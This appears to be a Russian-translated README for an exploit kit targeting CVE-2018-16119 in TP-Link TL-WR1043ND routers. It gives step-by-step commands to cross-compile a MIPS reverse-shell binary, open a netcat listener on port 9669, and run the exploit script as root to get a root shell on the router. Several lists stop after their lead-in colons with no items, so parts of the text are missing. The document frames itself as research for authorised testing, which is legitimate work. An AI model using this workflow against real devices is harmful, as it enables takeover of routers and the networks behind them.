
TP-Link TL-WR1043ND - Аутентифицированное удаленное выполнение кода
CVE-2018-16119 — это критическая уязвимость аутентифицированного удаленного выполнения кода, затрагивающая маршрутизаторы TP-Link TL-WR1043ND. Эта уязвимость позволяет аутентифицированным злоумышленникам выполнять произвольные команды на целевом устройстве с привилегиями root, что потенциально может привести к полной компрометации системы.
Детали CVE: CVE-2018-16119
После эксплуатации злоумышленник получает root-доступ к оболочке маршрутизатора, что позволяет ему:
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io
Эксплойту требуется бинарный файл обратной оболочки MIPS big-endian. Выполните следующие шаги для его компиляции:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Внутри Docker-контейнера:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Выйдите из Docker и скопируйте скомпилированный бинарный файл:
cp /tmp/shh exploit/tftp_server/
Откройте терминал и запустите слушатель netcat на порту 9669:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
Запустите скрипт эксплойта с привилегиями root (требуется для TFTP-сервера):
sudo python3 exploit/exploit.py
Скрипт выполнит:
После установки соединения:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
Эта уязвимость была ответственно раскрыта и должна использоваться только для:
⚠️ ПРЕДУПРЕЖДЕНИЕ: Данный эксплойт предоставляется только для образовательных и авторизованных целей тестирования. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Пользователи несут ответственность за получение соответствующих разрешений перед использованием этого инструмента.
Установите зависимости Python:
pip3 install -r exploit/requirements.txt
Отказ в доступе к TFTP-серверу:
Ошибка подключения:
Нет ответа от оболочки:
id или pwdЭто исследование демонстрирует критические недостатки безопасности в прошивке встраиваемых устройств. Уязвимость подчеркивает важность:
Исследователь: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
Данное исследование проводилось в образовательных целях и для повышения безопасности встраиваемых систем. Пожалуйста, используйте ответственно.